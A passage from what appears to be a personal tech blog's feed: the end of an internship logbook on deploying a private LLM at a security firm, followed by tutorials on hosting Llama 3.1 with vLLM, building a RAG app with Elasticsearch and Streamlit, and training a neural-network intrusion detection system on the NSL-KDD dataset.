prioritize project elements.</li><li><strong>First Company Visit: </strong>Gayatri visited me at the Secura Amsterdam office. 
We discussed my progress with my company mentor.</li><li><strong>Functional Document: </strong>Continued describing things in a non-technical way.</li></ul><p>Feedback from Joel:</p><ul><li>Invest some time to look at the EU AI Act and how it is used in the project.</li></ul><p>Feedback from Gayatri:</p><ul><li>Gayatri liked the structure of the first version of the project plan and mentioned that it is almost perfect.</li><li>To complete the project plan, Gayatri recommended adding a network diagram and a list of professional products for each learning outcome.</li><li>Create a design challenge document.</li><li>Create a logbook.</li></ul><h3 id="weeks-5-and-6-september-30-2024october-11-2024">Weeks 5 and 6 (September 30, 2024 - October 11, 2024)</h3><ul><li><strong>Functional Document: </strong>I finished the functional document that describes things in a non-technical way, and it was approved by my company mentor.</li><li><strong>Technical Design Document:</strong> I created the first draft of the technical design document.</li><li><strong>Research: </strong>I finished the third research question, which covers vector databases, and I concluded that I will be using Chroma DB for my project.</li><li><strong>Design Challenge Document: </strong>I finished the design challenge document.</li><li><strong>EU AI Act Document: </strong>I created a document discussing the EU AI Act and how it applies to my project.</li></ul><p>Feedback from Joel:</p><ul><li>He approved the functional design document and advised me to start translating it into a technical design document.</li><li>The first draft of the technical design document is missing the details of how I plan to build the LLM server. I still do not know the details. 
Therefore, I suggested that I finish my research first, then create the technical document, and Joel agreed with this approach.</li></ul><h3 id="weeks-7-and-8-october-14-2024november-01-2024">Weeks 7 and 8 (October 14, 2024 - November 01, 2024)</h3><ul><li><strong>Research: </strong>I finished the fourth research question, which covered the backend and frontend frameworks for my project. I ended up choosing vLLM for the backend and Open Web UI for the frontend.</li><li><strong>Portfolio: </strong>I started creating the portfolio by combining every professional product in one place. I submitted the first version of the portfolio.</li><li><strong>Reading: </strong>I invested some time reading about new trends in open-source AI models. This can help me create the advice report later this semester.</li><li><strong>Cloud Prices: </strong>Joel asked me to research the prices of cloud GPUs and choose the best option for my project in case there is another delay in the hardware. Therefore, I created a document detailing the prices of many possible services.</li></ul><p>Feedback from Joel:</p><ul><li>You have answered sub-questions 1 to 4 so far, but the elaboration is rather short, and it would be good to read more about the &quot;how&quot; and &quot;why&quot; behind your choices, as I believe you have done the analysis to determine which option is best.</li><li>For example, &quot;Chroma DB&#x2019;s user-friendly interface and many plugins make it easier to set up and use, saving time during development,&quot; but the &quot;how&quot; and &quot;why&quot; are missing, so more details about the kind of plugins and their specific benefits would be helpful; another example is &quot;Open Web UI was chosen for its user-friendly design,&quot; which would benefit from an explanation of why this design is better compared to other options.</li><li>Mohammed is always offering to help, but it should not limit him in his eagerness to analyze, test or execute things without 
asking.</li></ul><p>Feedback from Gayatri:</p><ul><li>You are doing well in showcasing all learning outcomes with proper evidence.</li><li>Try to add some theory in the Project Approach section, preferably in the form of diagrams or other visual elements.</li><li>For each sub-question: explain its DOT framework and strategy, remove the conclusion for each question, and add a solution for each question instead.</li><li>For conclusions and recommendations: include them as separate topics for the overall report; do not add them for each question individually.</li><li>The rest is progressing well.</li></ul><h3 id="weeks-9-and-10-november-4-2024november-15-2024">Weeks 9 and 10 (November 4, 2024 - November 15, 2024)</h3><ul><li><strong>Literature Review: </strong>I read about LLM optimization techniques. This can help me improve the speed of LLM inference.</li><li><strong>Cybersecurity Event in Utrecht: </strong>My company mentor Joel advised me to visit a cybersecurity event in Utrecht. It was a special experience meeting professionals in the field of cybersecurity and AI.</li><li><strong>Meeting with IT department: </strong>Joel and I had a meeting with the IT specialist to discuss the status of the LLM hardware and how I will be able to access it.</li><li><strong>Mid-term reviews: </strong>I asked Joel to fill in the mid-term review for Fontys. I also filled in one myself, reflecting on my progress so far.</li></ul><p>Feedback from Joel:</p><ul><li>Find out how Secura writes test plan documents and create one for your project.</li><li>Joel said that Ralph approved paying for the cloud as a temporary solution. Therefore, start building your findings using a cloud provider.</li></ul><h3 id="weeks-11-and-12-november-18-2024november-29-2024">Weeks 11 and 12 (November 18, 2024 - November 29, 2024)</h3><ul><li><strong>Mid-term Return Day Pitch:</strong> I presented my progress to my two Fontys assessors and to some students. 
I was also able to learn from other graduates who presented their work.</li><li><strong>Assessors Feedback: </strong>I worked on the feedback received from the two assessors.</li><li><strong>Rent a GPU: </strong>I used the cloud to rent a GPU and build my product on it as a temporary solution.</li><li><strong>Demo: </strong>I showed Joel a demo of the LLM deployed on the cloud.</li></ul><p>Feedback from Mehrzad:</p><ul><li>Show the approach better (DOT framework usage in detail)</li><li>Show an agenda for the presentation</li><li>Show page numbers</li><li>Include a page for sprint activities</li><li>Explain why your solution is better than using ready-made products like ChatGPT.</li></ul><h3 id="weeks-13-and-14-december-02-2024december-13-2024">Weeks 13 and 14 (December 02, 2024 - December 13, 2024)</h3><ul><li><strong>LLM Design Plan: </strong>I created an LLM Design Plan that explains to the IT department what the LLM machine is expected to do and which operating system it should run. I also explained what types of connections it needs and when it should be disconnected completely from internet access. The document also explains who will be the administrators for the application.</li><li><strong>Technical Implementation Guide: </strong>I created a Technical Implementation Guide document that explains in detail all the steps needed to host the frontend and the backend on an Ubuntu 20.04 server. The steps are the following:<ul><li>Download CUDA Toolkit</li><li>Install cuDNN</li><li>Install Python 3.11</li><li>Create a Virtual Environment</li><li>Install &amp; Run the Backend (vLLM)</li><li>Install &amp; Run the Frontend (Open Web UI)</li><li>Access the Application</li></ul></li><li><strong>Access the Server: </strong>I got an SSH connection to the LLM machine. I installed the backend and the frontend and connected them to each other. I had issues installing the Nvidia CUDA toolkit and cuDNN. However, I eventually successfully installed everything needed. 
Every issue and its fix is well documented.</li><li><strong>Secura Christmas Party: </strong>I got the chance to attend the company&apos;s Christmas party; it was nice meeting and connecting with other Secura employees.</li></ul><p>Feedback from Joel:</p><ul><li>Joel helped me to improve the documents.</li><li>Joel encountered an error when trying to upload a big document. I fixed this issue by increasing the LLM&apos;s capacity to handle around 10 thousand words per request.</li></ul><h3 id="weeks-15-and-16-december-16-2024january-10-2025-christmas-break">Weeks 15 and 16 (December 16, 2024 - January 10, 2025) + Christmas Break</h3><ul><li><strong>Meeting with Joel Regarding the Deliverables: </strong>I had a meeting with my mentor to discuss the deliverables for both the company and the university.</li><li><strong>I canceled the cloud subscription: </strong>Now that we have a powerful server with dual RTX 4090 GPUs locally, I canceled the cloud subscription.</li><li><strong>Discussed the LLM&apos;s Accuracy with Joel: </strong>I had a meeting with Joel to discuss the current accuracy of the LLM and plans on how to improve it. Joel asked me to find new ways to improve the accuracy.</li><li><strong>New Embedding Model: </strong>To improve the accuracy, I installed a better and more powerful embedding model. One of the drawbacks is that it needs more time to answer and consumes more GPU resources. However, Joel said that these issues can be overlooked if the accuracy is improving.</li></ul><p>Feedback from Joel:</p><ul><li>Create backup plans.</li></ul><h3 id="weeks-17-and-18-january-13-2025january-24-2025-christmas-break">Weeks 17 and 18 (January 13, 2025 - January 24, 2025) + Christmas Break</h3><ul><li><strong>Meeting with Stakeholders: </strong>I had multiple meetings with Joel, Ralph, and Paul to discuss the future of this project. I showed them that the RAG and translator are working. 
</li><li><strong>Fine Tuning the LLM:</strong> Paul asked me if I can fine tune the LLM on their own data. I used many Secura reports to create a dataset for the fine tuning. I managed to create a fine tuned model on only 1300 examples. I explained to them that in order to have decent quality, they need more examples to include.</li><li><strong>Documenting: </strong>Joel, Ralph, and Paul mentioned that I should document every detail to make it easier for whoever comes after me working on the project.</li></ul>]]></content:encoded></item><item><title><![CDATA[Hosting Llama 3.1 Locally with Dual RTX 4090]]></title><description><![CDATA[<p>Hosting large language models (LLMs) like Llama on local hardware provides the flexibility to handle sensitive data in-house while maximizing performance using advanced GPUs like the RTX 4090. In this post, I&#x2019;ll walk you through how to set up Llama (Meta-Llama-3.1-70B) on an Ubuntu server using dual</p>]]></description><link>https://blog.mohammedx.tech/privatellm/</link><guid isPermaLink="false">66e89b292074360001f33db1</guid><category><![CDATA[GenAI]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Mon, 16 Sep 2024 21:12:00 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2024/09/generative-ai-tools.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2024/09/generative-ai-tools.jpg" alt="Hosting Llama 3.1 Locally with Dual RTX 4090"><p>Hosting large language models (LLMs) like Llama on local hardware provides the flexibility to handle sensitive data in-house while maximizing performance using advanced GPUs like the RTX 4090. In this post, I&#x2019;ll walk you through how to set up Llama (Meta-Llama-3.1-70B) on an Ubuntu server using dual RTX 4090 GPUs. 
I will use <strong>vLLM</strong> as the backend for efficient model serving.</p><h2 id="creating-a-virtual-environment"><strong>Creating a Virtual Environment</strong></h2><pre><code class="language-python">python3 -m venv .venv
source .venv/bin/activate</code></pre><p>This command creates and activates a virtual environment named <code>.venv</code>, which isolates dependencies and packages for your project.</p><h2 id="installing-vllm"><strong>Installing vLLM</strong></h2><pre><code class="language-python">pip install vllm</code></pre><p><strong>vLLM</strong> is a high-performance backend server specifically designed for efficient serving of large language models. It allows you to expose LLMs as APIs that can be queried from external applications. Unlike traditional model-serving frameworks, vLLM is optimized for low-latency inference and supports advanced features like tensor parallelism (for distributing models across multiple GPUs).</p><p>By installing <code>vllm</code>, I am setting up the infrastructure needed to handle model requests and interact with our Llama model via an API.</p><h2 id="installing-tokenizers"><strong>Installing Tokenizers</strong></h2><pre><code class="language-python">pip install tokenizers==0.19.0</code></pre><p>The <strong>tokenizers</strong> library is crucial for breaking down input text into tokens that the model understands. Different models use different tokenization schemes, so it&apos;s essential to have the correct version. Here, I am installing version 0.19.0 to ensure compatibility with the Llama model.</p><h2 id="launching-the-vllm-server"><strong>Launching the vLLM Server</strong></h2><pre><code class="language-python">python3 -m vllm.entrypoints.openai.api_server \
  --model neuralmagic/Meta-Llama-3.1-70B-Instruct-quantized.w4a16 \
  --served-model-name meta-llama/Meta-Llama-3.1-70B-Instruct \
  --tensor-parallel-size 2 \
  --gpu-memory-utilization 0.98 \
  --host 0.0.0.0 \
  --port 8000 \
  --max_model_len 8192</code></pre><p>This command launches the <strong>vLLM server</strong> with the necessary parameters to serve the Llama model. Let&apos;s break down each part in detail:</p><ol><li>Loading the Quantized Model</li></ol><pre><code class="language-python">--model neuralmagic/Meta-Llama-3.1-70B-Instruct-quantized.w4a16</code></pre><p>Quantization reduces the precision of the model weights (in this case, 4-bit weights with 16-bit activations) to decrease the size and speed up inference without significantly impacting accuracy. The <code>neuralmagic/Meta-Llama-3.1-70B-Instruct-quantized.w4a16</code> model is a quantized version of the 70B Llama model, which makes it feasible to host on even high-end hardware like dual RTX 4090 GPUs.</p><ol start="2"><li> Defining the Model Name for Serving</li></ol><pre><code class="language-python">--served-model-name meta-llama/Meta-Llama-3.1-70B-Instruct</code></pre><p>This parameter specifies the name by which the model will be identified when making API requests. It is especially useful if you plan to serve multiple models in the future, as each can be uniquely named and referenced.</p><ol start="3"><li>Setting Tensor Parallelism for Multi-GPU Use</li></ol><pre><code class="language-python">--tensor-parallel-size 2</code></pre><p>Since I have two RTX 4090 GPUs, I set the tensor parallel size to 2. <strong>Tensor parallelism</strong> allows the model to split its operations across multiple GPUs, effectively sharing the load and accelerating inference. The large size of the Llama model (70B parameters) makes this kind of parallelism essential for efficient processing.</p><ol start="4"><li>Configuring GPU Memory Utilization</li></ol><pre><code class="language-python">--gpu-memory-utilization 0.98</code></pre><p>This parameter ensures that nearly all available GPU memory (98%) is utilized, maximizing the model&#x2019;s performance without hitting memory limits. 
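As a sanity check on these choices, here is a rough back-of-envelope for the weights alone (illustrative arithmetic; it ignores activations and the KV cache, which also consume VRAM):

```python
params = 70e9                 # Llama 3.1 70B parameter count
fp16_gb = params * 2 / 1e9    # 16-bit weights take 2 bytes each
w4_gb = params * 0.5 / 1e9    # 4-bit quantized weights take 0.5 bytes each
usable_gb = 2 * 24 * 0.98     # dual RTX 4090 (24 GB each) at 98% utilization

print(round(fp16_gb), round(w4_gb), round(usable_gb, 1))  # 140 35 47.0
```

The fp16 weights alone would need roughly 140 GB, far beyond the 48 GB of combined VRAM, while the 4-bit weights fit with headroom left over for activations and the KV cache.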
The dual RTX 4090 GPUs have enough memory to comfortably handle this high utilization rate, allowing me to process larger batches of data or longer sequences.</p><ol start="5"><li>Setting the Host Address</li></ol><pre><code class="language-python">--host 0.0.0.0</code></pre><p>By setting the host to <code>0.0.0.0</code>, the server listens on all available network interfaces. This is crucial if you want to access the model API from external machines on your network, such as other servers or workstations.</p><ol start="6"><li>Setting the Port</li></ol><pre><code class="language-python">--port 8000</code></pre><p>The port number defines where the API server will be accessible. Port <code>8000</code> is a common choice, but you can change it based on your network configuration or preferences.</p><ol start="7"><li>Defining Maximum Model Length</li></ol><pre><code class="language-python">--max_model_len 8192</code></pre><p>This parameter sets the maximum length (in tokens) that the model can process in a single request. Large language models like Llama can handle extensive inputs, and setting this value to <code>8192</code> ensures that even longer sequences of text can be handled efficiently.</p><h2 id="conclusion"><strong>Conclusion</strong></h2><p>By following the steps above, I have successfully hosted the Llama model on an Ubuntu server using dual RTX 4090 GPUs. With <strong>vLLM</strong> acting as the backend server, I now have a scalable, high-performance API that can handle real-time Llama model inference requests. 
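Once running, the server can be exercised through the OpenAI-compatible HTTP API that vLLM exposes. Below is a minimal client sketch (illustrative, using only the standard library): the URL assumes the server is reachable as localhost, and the model name must match the <code>--served-model-name</code> flag from the launch command.

```python
import json
import urllib.request

# Host and port follow the --host/--port flags from the launch command.
API_URL = "http://localhost:8000/v1/chat/completions"

def build_chat_request(prompt: str) -> dict:
    """Assemble a chat-completion payload for the served model."""
    return {
        # Must match --served-model-name from the launch command
        "model": "meta-llama/Meta-Llama-3.1-70B-Instruct",
        "messages": [{"role": "user", "content": prompt}],
        "max_tokens": 128,
    }

def ask(prompt: str) -> str:
    """POST the payload and return the assistant's reply text."""
    req = urllib.request.Request(
        API_URL,
        data=json.dumps(build_chat_request(prompt)).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        body = json.load(resp)
    return body["choices"][0]["message"]["content"]
```

Because the server listens on <code>0.0.0.0</code>, calling <code>ask()</code> from another machine on the network only requires replacing localhost with the server's address.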
This setup leverages GPU parallelism and model quantization to optimize performance while ensuring that your hardware is fully utilized.</p><p>Now, I can integrate this locally hosted model into various applications, whether for research, development, or deployment in production environments.</p>]]></content:encoded></item><item><title><![CDATA[RAG Using Llama3]]></title><description><![CDATA[<p>Retrieval-Augmented Generation (RAG) is crucial for companies with private documents, enhancing response accuracy by combining retrieval and generation. It allows accessing relevant internal data without relying on external APIs, ensuring data security and confidentiality while providing contextually accurate and coherent answers for applications like chatbots and virtual assistants.</p><p></p><p>In this</p>]]></description><link>https://blog.mohammedx.tech/rag-using-llama3/</link><guid isPermaLink="false">66734e132074360001f33d57</guid><category><![CDATA[AI]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Wed, 19 Jun 2024 21:38:25 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2024/06/ai-chatbot-agency-2024.webp" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2024/06/ai-chatbot-agency-2024.webp" alt="RAG Using Llama3"><p>Retrieval-Augmented Generation (RAG) is crucial for companies with private documents, enhancing response accuracy by combining retrieval and generation. It allows accessing relevant internal data without relying on external APIs, ensuring data security and confidentiality while providing contextually accurate and coherent answers for applications like chatbots and virtual assistants.</p><p></p><p>In this blog post, I will create a Streamlit application that allows users to index documents and ask questions about them. 
I will use Elasticsearch for document storage and retrieval, and a local language model API for generating responses.</p><h2 id="setup">Setup</h2><p>First, ensure you have all the required dependencies installed:</p><pre><code class="language-python">pip install streamlit elasticsearch sentence-transformers requests</code></pre><p>Initializing Elasticsearch and SentenceTransformer</p><pre><code class="language-python">import streamlit as st
from elasticsearch import Elasticsearch
from sentence_transformers import SentenceTransformer
import requests
import os

es = Elasticsearch(
    hosts=[{&apos;host&apos;: &apos;localhost&apos;, &apos;port&apos;: 9200, &apos;scheme&apos;: &apos;http&apos;}]
)
model_name = &apos;all-MiniLM-L6-v2&apos;
sentence_model = SentenceTransformer(model_name)</code></pre><h2 id="creating-the-elasticsearch-index">Creating the Elasticsearch Index</h2><p>Create an Elasticsearch index to store the documents and their embeddings if it doesn&apos;t already exist.</p><pre><code class="language-python">def create_index():
    if not es.indices.exists(index=&quot;documents&quot;):
        es.indices.create(
            index=&quot;documents&quot;,
            body={
                &quot;mappings&quot;: {
                    &quot;properties&quot;: {
                        &quot;text&quot;: {&quot;type&quot;: &quot;text&quot;},
                        &quot;embedding&quot;: {&quot;type&quot;: &quot;dense_vector&quot;, &quot;dims&quot;: 384}
                    }
                }
            }
        )

create_index()</code></pre><h2 id="indexing-documents">Indexing Documents</h2><p>Function to index a new document by generating its embedding and storing it in Elasticsearch.</p><pre><code class="language-python">def index_document(doc_text):
    embedding = sentence_model.encode(doc_text)
    es.index(
        index=&quot;documents&quot;,
        body={
            &quot;text&quot;: doc_text,
            &quot;embedding&quot;: embedding.tolist()
        }
    )</code></pre><h2 id="handling-user-questions">Handling User Questions</h2><p>Generate the embedding for the user&apos;s question.</p><pre><code class="language-python">def handle_question(question):
    query_embedding = sentence_model.encode(question)</code></pre><p>Retrieving Relevant Documents. Note that this code continues inside <code>handle_question</code>, so it can use <code>query_embedding</code> and pass the retrieved context on to the language model.</p><pre><code class="language-python">    # Still inside handle_question: rank stored documents by cosine similarity
    response = es.search(
        index=&quot;documents&quot;,
        body={
            &quot;query&quot;: {
                &quot;script_score&quot;: {
                    &quot;query&quot;: {&quot;match_all&quot;: {}},
                    &quot;script&quot;: {
                        &quot;source&quot;: &quot;cosineSimilarity(params.query_vector, &apos;embedding&apos;) + 1.0&quot;,
                        &quot;params&quot;: {&quot;query_vector&quot;: query_embedding.tolist()}
                    }
                }
            },
            &quot;size&quot;: 5
        }
    )

    retrieved_docs = [hit[&apos;_source&apos;][&apos;text&apos;] for hit in response[&apos;hits&apos;][&apos;hits&apos;]]
    context = &quot; &quot;.join(retrieved_docs)

    # Augment the question with the retrieved context and ask the local model
    answer = call_local_model(f&quot;Context: {context}\n\nQuestion: {question}&quot;)
    if answer:
        st.write(answer.get(&quot;message&quot;, {}).get(&quot;content&quot;, &quot;&quot;))</code></pre><p>Calling the Local Language Model API</p><pre><code class="language-python">def call_local_model(user_input):
    url = &quot;http://192.168.1.10:11434/api/chat&quot;
    payload = {
        &quot;model&quot;: &quot;llama3&quot;,
        &quot;messages&quot;: [
            { &quot;role&quot;: &quot;user&quot;, &quot;content&quot;: user_input }
        ],
        &quot;stream&quot;: False
    }
    headers = {
        &quot;Content-Type&quot;: &quot;application/json&quot;
    }
    response = requests.post(url, json=payload, headers=headers)
    
    try:
        response_json = response.json()
        print(response_json)
        return response_json
    except ValueError:
        st.error(&quot;Failed to decode JSON response&quot;)
        return None</code></pre><h2 id="streamlit-app">Streamlit App</h2><p>Initialize Streamlit session state variables.</p><pre><code class="language-python">if &quot;conversation&quot; not in st.session_state:
    st.session_state.conversation = None
if &quot;chat_history&quot; not in st.session_state:
    st.session_state.chat_history = []</code></pre><p>Add a text area to input and index a new document.</p><pre><code class="language-python">st.header(&quot;ASK PDFs :books:&quot;)

new_document = st.text_area(&quot;Add a new document to the index:&quot;)
if st.button(&quot;Index Document&quot;):
    if new_document:
        index_document(new_document)
        st.success(&quot;Document indexed successfully!&quot;)</code></pre><p>Input for user questions and handle them using the previously defined functions.</p><pre><code class="language-python">user_question = st.text_input(&quot;Ask questions about the uploaded document:&quot;)
if user_question:
    handle_question(user_question)</code></pre><h2 id="conclusion">Conclusion</h2><p>In this blog post, I demonstrated how to create a Streamlit application that indexes documents and answers questions about them using Elasticsearch and a local language model API. This application allows users to interactively add documents and retrieve relevant information based on their queries.</p><p></p><p></p>]]></content:encoded></item><item><title><![CDATA[AI-Powered IDS]]></title><description><![CDATA[<p>In this blog post, I will walk you through the implementation of an AI-powered Intrusion Detection System (IDS) using machine learning techniques. I will cover the preprocessing of the dataset, building a neural network model, training the model, and evaluating its performance. </p><h2 id="importing-necessary-libraries">Importing Necessary Libraries</h2><p>First, I need to import</p>]]></description><link>https://blog.mohammedx.tech/ai-powered-ids/</link><guid isPermaLink="false">667343b52074360001f33d01</guid><category><![CDATA[AI]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Wed, 19 Jun 2024 20:50:31 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2024/06/shutterstock_480872044.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2024/06/shutterstock_480872044.jpg" alt="AI-Powered IDS"><p>In this blog post, I will walk you through the implementation of an AI-powered Intrusion Detection System (IDS) using machine learning techniques. I will cover the preprocessing of the dataset, building a neural network model, training the model, and evaluating its performance. </p><h2 id="importing-necessary-libraries">Importing Necessary Libraries</h2><p>First, I need to import the necessary libraries for our project. These include libraries for data manipulation, visualization, and building neural networks.</p><pre><code class="language-python">import torch
import torch.nn as nn
import torch.nn.functional as F
import matplotlib.pyplot as plt 
import pandas as pd
%matplotlib inline</code></pre><h2 id="loading-the-dataset">Loading the Dataset</h2><p>Next, I load the training and testing datasets. These datasets contain network traffic data which we will use to train and evaluate our model.</p><pre><code class="language-python">df = pd.read_csv(&apos;./archive/KDDTrain+.txt&apos;, header=None)  
test_df = pd.read_csv(&apos;./archive/KDDTest+.txt&apos;, header=None)  
columns = [
    &apos;duration&apos;, &apos;protocol_type&apos;, &apos;service&apos;, &apos;flag&apos;, &apos;src_bytes&apos;, &apos;dst_bytes&apos;, &apos;land&apos;,
    &apos;wrong_fragment&apos;, &apos;urgent&apos;, &apos;hot&apos;, &apos;num_failed_logins&apos;, &apos;logged_in&apos;, &apos;num_compromised&apos;,
    &apos;root_shell&apos;, &apos;su_attempted&apos;, &apos;num_root&apos;, &apos;num_file_creations&apos;, &apos;num_shells&apos;,
    &apos;num_access_files&apos;, &apos;num_outbound_cmds&apos;, &apos;is_host_login&apos;, &apos;is_guest_login&apos;, &apos;count&apos;,
    &apos;srv_count&apos;, &apos;serror_rate&apos;, &apos;srv_serror_rate&apos;, &apos;rerror_rate&apos;, &apos;srv_rerror_rate&apos;,
    &apos;same_srv_rate&apos;, &apos;diff_srv_rate&apos;, &apos;srv_diff_host_rate&apos;, &apos;dst_host_count&apos;,
    &apos;dst_host_srv_count&apos;, &apos;dst_host_same_srv_rate&apos;, &apos;dst_host_diff_srv_rate&apos;,
    &apos;dst_host_same_src_port_rate&apos;, &apos;dst_host_srv_diff_host_rate&apos;, &apos;dst_host_serror_rate&apos;,
    &apos;dst_host_srv_serror_rate&apos;, &apos;dst_host_rerror_rate&apos;, &apos;dst_host_srv_rerror_rate&apos;,
    &apos;attack&apos;, &apos;level&apos;
]
df.columns = columns
test_df.columns = columns</code></pre><h2 id="data-preprocessing">Data Preprocessing</h2><p>To prepare the data for training, I convert the <code>attack</code> column to a binary format, where &apos;normal&apos; traffic is labeled as 0 and all other traffic is labeled as 1. I also encode categorical variables.</p><pre><code class="language-python">df[&apos;attack_binary&apos;] = df.attack.map(lambda a: 0 if a == &apos;normal&apos; else 1)
df.drop(&apos;attack&apos;, axis=1, inplace=True)

test_df[&apos;attack_binary&apos;] = test_df.attack.map(lambda a: 0 if a == &apos;normal&apos; else 1)
test_df.drop(&apos;attack&apos;, axis=1, inplace=True)

from sklearn import preprocessing
le = preprocessing.LabelEncoder()
clm = [&apos;protocol_type&apos;, &apos;service&apos;, &apos;flag&apos;]
for x in clm:
    # Note: ideally fit one encoder on the union of train and test values,
    # e.g. le.fit(pd.concat([df[x], test_df[x]])), then call le.transform on
    # each split; fitting separately on each split can assign the same
    # category a different integer in train and test.
    df[x] = le.fit_transform(df[x])
    test_df[x] = le.fit_transform(test_df[x])</code></pre><h2 id="feature-selection">Feature Selection</h2><p>I select specific features for our model to train on.</p><pre><code class="language-python">features = [&apos;service&apos;, &apos;flag&apos;, &apos;src_bytes&apos;, &apos;dst_bytes&apos;, &apos;logged_in&apos;, &apos;count&apos;,
       &apos;serror_rate&apos;, &apos;srv_serror_rate&apos;, &apos;same_srv_rate&apos;, &apos;diff_srv_rate&apos;,
       &apos;dst_host_srv_count&apos;, &apos;dst_host_same_srv_rate&apos;,
       &apos;dst_host_diff_srv_rate&apos;, &apos;dst_host_serror_rate&apos;,
       &apos;dst_host_srv_serror_rate&apos;]
X = df[features]
y = df[&apos;attack_binary&apos;]
X = X.values
y = y.values</code></pre><h2 id="splitting-the-dataset">Splitting the Dataset</h2><p>I split the dataset into training and testing sets.</p><pre><code class="language-python">from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=41)
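# (Toy aside of mine, not part of the pipeline.) An 80/20 split of 10 items
# yields 8 training and 2 test items, and the fixed random_state makes the
# shuffle reproducible across runs:
toy_items = list(range(10))
toy_train, toy_test = train_test_split(toy_items, test_size=0.2, random_state=41)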
X_train = torch.FloatTensor(X_train)
X_test = torch.FloatTensor(X_test)
y_train = torch.LongTensor(y_train)
y_test = torch.LongTensor(y_test)</code></pre><h2 id="building-the-neural-network-model">Building the Neural Network Model</h2><p>I define our neural network architecture.</p><pre><code class="language-python">class Model(nn.Module):
    def __init__(self, in_features=15, h1=30, h2=30, h3=30, out_features=2):
        super().__init__()
        self.fc1 = nn.Linear(in_features, h1)
        self.fc2 = nn.Linear(h1, h2)
        self.fc3 = nn.Linear(h2, h3)
        self.out = nn.Linear(h3, out_features)

    def forward(self, x):
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        x = F.relu(self.fc3(x))
        x = self.out(x)
        return x</code></pre><h2 id="training-the-model">Training the Model</h2><p>I initialize the model, define the loss function and optimizer, and then train the model.</p><pre><code class="language-python">torch.manual_seed(41)
model = Model()
weights = torch.tensor([0.5, 3.0], dtype=torch.float32)  # Increase the weight for the &apos;attack&apos; class
criterion = nn.CrossEntropyLoss(weight=weights)
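import math

# (My aside, not from the original post.) The class weights above make a
# missed attack cost more loss than a missed normal flow. Per-sample weighted
# cross-entropy is -w[target] * log(softmax(logits)[target]), up to PyTorch's
# normalisation; a tiny pure-Python sketch:
def toy_weighted_ce(logits, target, w):
    exps = [math.exp(z) for z in logits]
    p = exps[target] / sum(exps)
    return -w[target] * math.log(p)

# Equally confident mistakes: the missed attack (class 1, weight 3.0) costs
# exactly 6x the missed normal flow (class 0, weight 0.5).
miss_attack = toy_weighted_ce([2.0, 0.0], 1, [0.5, 3.0])
miss_normal = toy_weighted_ce([0.0, 2.0], 0, [0.5, 3.0])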
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
epochs = 600
losses = []
for i in range(epochs):
    y_pred = model.forward(X_train)
    loss = criterion(y_pred, y_train)
    losses.append(loss.detach().numpy())
    if i % 10 == 0:
        print(f&apos;Epoch: {i} and loss: {loss}&apos;)
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
plt.plot(range(epochs), losses)
plt.ylabel(&quot;loss/errors&quot;)
plt.xlabel(&apos;Epoch&apos;)</code></pre><h2 id="evaluating-the-model">Evaluating the Model</h2><p>I evaluate the model&apos;s performance on the test set.</p><pre><code class="language-python">with torch.no_grad():
    y_eval = model.forward(X_test)
    loss = criterion(y_eval, y_test)
correct = 0 
with torch.no_grad():
    for i, data in enumerate(X_test):
        y_val = model.forward(data)
        print(f&apos;{i+1}.) {str(y_val)} \t {y_test[i]} \t {y_val.argmax().item()}&apos;)
        if y_val.argmax().item() == y_test[i]:
            correct += 1
print(correct)</code></pre><h2 id="model-metrics">Model Metrics</h2><p>I calculate accuracy, precision, recall, and plot the confusion matrix.</p><pre><code class="language-python">import torch
from sklearn.metrics import accuracy_score, classification_report, precision_score, recall_score
model.eval()
predictions = []
labels = []
with torch.no_grad():
    for data, label in zip(X_test, y_test):
        y_val = model(data.unsqueeze(0))  
        _, predicted = torch.max(y_val, dim=1)
        predictions.append(predicted.item())
        labels.append(label.item())

accuracy = accuracy_score(labels, predictions)
precision = precision_score(labels, predictions, average=&apos;weighted&apos;)
recall = recall_score(labels, predictions, average=&apos;weighted&apos;)
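# (My addition; the post reports only accuracy, precision and recall.) F1 is
# the harmonic mean of precision and recall, and is often the better single
# summary on imbalanced IDS data. The formula, checked on toy values:
def f1_from(precision_val, recall_val):
    return 2 * precision_val * recall_val / (precision_val + recall_val)

toy_f1 = f1_from(0.8, 0.5)
# f1_from(precision, recall) applied to the scores above gives the model's F1.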
report = classification_report(labels, predictions)
print(f&apos;Accuracy: {accuracy * 100:.2f}%&apos;)
print(f&apos;Precision: {precision * 100:.2f}%&apos;)
print(f&apos;Recall: {recall * 100:.2f}%&apos;)
print(&quot;Classification Report:&quot;)
print(report)</code></pre><h2 id="confusion-matrix">Confusion Matrix</h2><p>Finally, I will visualize the confusion matrix to understand the performance of our model better.</p><pre><code class="language-python">from sklearn.metrics import classification_report, accuracy_score, precision_score, recall_score, confusion_matrix
import seaborn as sns

neuralnetwork = confusion_matrix(labels, predictions)
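# (My aside.) sklearn lays the matrix out with rows as true labels and
# columns as predictions, so for binary data it reads [[TN, FP], [FN, TP]].
# Toy check: one clean negative, one false alarm, no misses, two detections.
toy_cm = confusion_matrix([0, 0, 1, 1], [0, 1, 1, 1])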
plt.figure(figsize=(8, 6))
sns.heatmap(neuralnetwork, annot=True, fmt=&apos;d&apos;, cmap=&apos;Blues&apos;, xticklabels=[&apos;Negative&apos;, &apos;Positive&apos;], yticklabels=[&apos;Negative&apos;, &apos;Positive&apos;])
plt.xlabel(&apos;Predicted Label&apos;)
plt.ylabel(&apos;True Label&apos;)
plt.title(&apos;Confusion Matrix&apos;)
